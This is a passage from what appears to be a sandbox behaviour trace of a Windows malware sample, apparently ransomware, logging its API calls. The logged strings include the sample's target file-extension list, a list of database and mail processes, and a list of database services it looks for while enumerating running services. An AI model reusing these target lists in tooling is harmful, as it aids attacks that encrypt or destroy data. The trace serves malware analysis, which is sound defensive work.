RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb20a18 [0031.752] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb20a18, Size=0x20) returned 0xb6cb48 [0031.752] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6cb48, Size=0x40) returned 0xb6c6d8 [0031.752] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0xb6d128 [0031.752] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_ZD24L0A") returned 0x0 [0031.753] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_ZD24L0A") returned 0x84 [0031.753] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb69bf0 | out: hHeap=0xb10000) returned 1 [0031.753] lstrlenW (lpString="Global\\syncronize_") returned 18 [0031.753] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6c6d8 | out: hHeap=0xb10000) returned 1 [0031.753] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x7) returned 0xb69bf0 [0031.753] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb20a18 [0031.753] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb20a18, Size=0x20) returned 0xb6cb48 [0031.753] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6cb48, Size=0x40) returned 0xb7d148 [0031.753] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0xb7e130 [0031.753] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_ZD24L0U") returned 0x0 [0031.753] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_ZD24L0U") returned 0x88 [0031.753] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb69bf0 | out: hHeap=0xb10000) returned 1 [0031.753] lstrlenW (lpString="Global\\syncronize_") returned 18 [0031.753] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb7d148 | out: hHeap=0xb10000) returned 1 [0031.753] GetVersion () returned 0x1db10106 [0031.753] GetCurrentProcess () returned 0xffffffff [0031.753] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fd10 | out: TokenHandle=0x18fd10*=0x8c) returned 1 [0031.753] GetTokenInformation (in: TokenHandle=0x8c, TokenInformationClass=0x14, TokenInformation=0x18fd0c, TokenInformationLength=0x4, ReturnLength=0x18fd18 | out: TokenInformation=0x18fd0c, ReturnLength=0x18fd18) returned 1 [0031.753] CloseHandle (hObject=0x8c) returned 1 [0031.754] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0x0) returned 0x0 [0031.754] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0x3e8) returned 0x0 [0031.754] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x14) returned 0xb69bf0 [0031.754] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb20a18 [0031.754] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb20a18, Size=0x20) returned 0xb6cb48 [0031.754] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6cb48, Size=0x40) returned 0xb7d148 [0031.754] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb7d148, Size=0x80) returned 0xb6c6d8 [0031.754] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c6d8, Size=0x100) returned 0xb6c6d8 [0031.754] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x34) returned 0xb6c7e0 [0031.754] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x4) returned 0xb69e68 [0031.754] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x4) returned 0xb69e78 [0031.754] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb69e88 [0031.754] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb20a18 [0031.754] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x4) returned 0xb6c820 [0031.754] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb20a30 [0031.754] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c820, Size=0x8) returned 0xb6c820 [0031.754] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb20a48 [0031.754] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c820, Size=0x10) returned 0xb6c820 [0031.754] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb20a60 [0031.754] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb20a78 [0031.754] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c820, Size=0x20) returned 0xb6c820 [0031.754] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb8e150 [0031.754] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb8e168 [0031.754] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb69e68, Size=0x8) returned 0xb69e68 [0031.754] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb69e78, Size=0x8) returned 0xb69e78 [0031.754] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb6c848 [0031.754] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb8e180 [0031.754] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x4) returned 0xb6c858 [0031.754] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb8e198 [0031.754] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c858, Size=0x8) returned 0xb6c858 [0031.754] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb8e1b0 [0031.754] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c858, Size=0x10) returned 0xb6c858 [0031.755] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb8e1c8 [0031.755] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb6c870 [0031.755] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c858, Size=0x20) returned 0xb6c880 [0031.755] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb69e68, Size=0x10) returned 0xb6c858 [0031.755] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb69e78, Size=0x10) returned 0xb6c8a8 [0031.755] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb69e68 [0031.755] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb8e1e0 [0031.755] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x4) returned 0xb69e78 [0031.755] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb8e1f8 [0031.755] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb69e78, Size=0x8) returned 0xb69e78 [0031.755] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb6c8c0 [0031.755] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb8e210 [0031.755] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x4) returned 0xb6c8d0 [0031.755] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb8e228 [0031.755] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c8d0, Size=0x8) returned 0xb6c8d0 [0031.755] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c858, Size=0x20) returned 0xb8e538 [0031.755] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c8a8, Size=0x20) returned 0xb8e560 [0031.755] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb6c8a8 [0031.755] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb8e240 [0031.755] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x4) returned 0xb6c858 [0031.755] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb8e258 [0031.755] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c858, Size=0x8) returned 0xb6c858 [0031.755] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x14) returned 0xb8e588 [0031.755] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x14) returned 0xb8e5a8 [0031.755] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0031.755] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6c6d8 | out: hHeap=0xb10000) returned 1 [0031.755] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x18fd5c | out: lpWSAData=0x18fd5c) returned 0 [0031.766] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e270 [0031.766] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e270, Size=0x20) returned 0xb6cd50 [0031.766] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6cd50, Size=0x40) returned 0xb7d148 [0031.766] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb7d148, Size=0x80) returned 0xb6c730 [0031.766] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c730, Size=0x100) returned 0xb8e880 [0031.766] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e270 [0031.766] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e270, Size=0x20) returned 0xb6cd50 [0031.766] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6cd50, Size=0x40) returned 0xb7d148 [0031.766] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb7d148, Size=0x80) returned 0xb6c730 [0031.766] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c730, Size=0x100) returned 0xb8e988 [0031.766] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb8e270 [0031.766] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x4) returned 0xb6c730 [0031.766] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e288 [0031.766] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c730, Size=0x8) returned 0xb6c730 [0031.767] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x14) returned 0xb6c740 [0031.767] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c730, Size=0x10) returned 0xb6c760 [0031.767] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x18) returned 0xb6c778 [0031.767] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x1a) returned 0xb6cd50 [0031.767] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c760, Size=0x20) returned 0xb6c798 [0031.767] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x1c) returned 0xb6cd78 [0031.767] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x16) returned 0xb6c7c0 [0031.767] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x1a) returned 0xb6cda0 [0031.767] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb8e2a0 [0031.767] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x4) returned 0xb6c730 [0031.767] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40) returned 0xb7d148 [0031.767] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c730, Size=0x8) returned 0xb6c730 [0031.767] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x3c) returned 0xb7d190 [0031.767] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c730, Size=0x10) returned 0xb6c760 [0031.767] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x14) returned 0xb8ea90 [0031.767] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x18) returned 0xb8eab0 [0031.767] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c760, Size=0x20) returned 0xb8ead0 [0031.767] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x24) returned 0xb8eaf8 [0031.767] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0031.767] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb8e880 | out: hHeap=0xb10000) returned 1 [0031.767] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0031.767] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb8e988 | out: hHeap=0xb10000) returned 1 [0031.767] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb8fd20 [0031.771] EnumServicesStatusExW (in: hSCManager=0xb8fd20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x18fcf8, lpServicesReturned=0x18fd10, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x18fcf8, lpServicesReturned=0x18fd10, lpResumeHandle=0x0) returned 0 [0031.772] GetLastError () returned 0xea [0031.772] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x11e4) returned 0xb91948 [0031.772] EnumServicesStatusExW (in: hSCManager=0xb8fd20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb91948, cbBufSize=0x11e4, pcbBytesNeeded=0x18fcf8, lpServicesReturned=0x18fd10, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb91948, pcbBytesNeeded=0x18fcf8, lpServicesReturned=0x18fd10, lpResumeHandle=0x0) returned 1 [0031.774] CloseServiceHandle (hSCObject=0xb8fd20) returned 1 [0031.775] lstrlenW (lpString="Appinfo") returned 7 [0031.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0031.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0031.775] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0031.775] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0031.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0031.776] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0031.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0031.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0031.776] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0031.776] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0031.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0031.776] lstrlenW (lpString="AudioSrv") returned 8 [0031.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0031.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0031.776] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0031.776] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0031.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0031.776] lstrlenW (lpString="BFE") returned 3 [0031.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0031.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0031.776] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0031.776] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0031.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0031.776] lstrlenW (lpString="CryptSvc") returned 8 [0031.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0031.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0031.776] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0031.776] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0031.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0031.776] lstrlenW (lpString="CscService") returned 10 [0031.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0031.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0031.776] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0031.776] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0031.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0031.776] lstrlenW (lpString="DcomLaunch") returned 10 [0031.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0031.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0031.776] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0031.776] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0031.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0031.776] lstrlenW (lpString="Dhcp") returned 4 [0031.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0031.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0031.777] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0031.777] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0031.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0031.777] lstrlenW (lpString="Dnscache") returned 8 [0031.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0031.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0031.777] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0031.777] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0031.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0031.777] lstrlenW (lpString="DPS") returned 3 [0031.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0031.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0031.777] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0031.777] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0031.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0031.777] lstrlenW (lpString="eventlog") returned 8 [0031.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0031.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0031.777] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0031.777] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0031.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0031.777] lstrlenW (lpString="EventSystem") returned 11 [0031.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0031.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0031.777] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0031.777] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0031.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0031.777] lstrlenW (lpString="gpsvc") returned 5 [0031.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0031.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0031.777] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0031.777] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0031.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0031.777] lstrlenW (lpString="iphlpsvc") returned 8 [0031.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0031.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0031.778] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0031.778] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0031.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0031.778] lstrlenW (lpString="LanmanServer") returned 12 [0031.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0031.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0031.778] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0031.778] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0031.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0031.778] lstrlenW (lpString="LanmanWorkstation") returned 17 [0031.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0031.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0031.778] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0031.778] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0031.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0031.778] lstrlenW (lpString="lmhosts") returned 7 [0031.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0031.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0031.778] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0031.778] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0031.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0031.778] lstrlenW (lpString="MMCSS") returned 5 [0031.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0031.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0031.778] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0031.778] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0031.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0031.778] lstrlenW (lpString="MpsSvc") returned 6 [0031.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0031.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0031.778] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0031.778] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0031.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0031.778] lstrlenW (lpString="Netman") returned 6 [0031.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0031.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0031.779] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0031.779] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0031.779] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0031.779] lstrlenW (lpString="netprofm") returned 8 [0031.779] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0031.779] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0031.779] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0031.779] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0031.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0031.793] lstrlenW (lpString="NlaSvc") returned 6 [0031.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0031.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0031.793] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0031.793] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0031.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0031.793] lstrlenW (lpString="nsi") returned 3 [0031.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0031.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0031.793] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0031.793] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0031.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0031.793] lstrlenW (lpString="PcaSvc") returned 6 [0031.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0031.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0031.793] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0031.793] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0031.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0031.793] lstrlenW (lpString="PlugPlay") returned 8 [0031.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0031.794] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0031.794] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0031.794] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0031.794] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0031.794] lstrlenW (lpString="Power") returned 5 [0031.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0031.794] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0031.794] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0031.794] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0031.794] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0031.794] lstrlenW (lpString="ProfSvc") returned 7 [0031.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0031.794] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0031.794] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0031.794] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0031.794] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0031.794] lstrlenW (lpString="RpcEptMapper") returned 12 [0031.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", 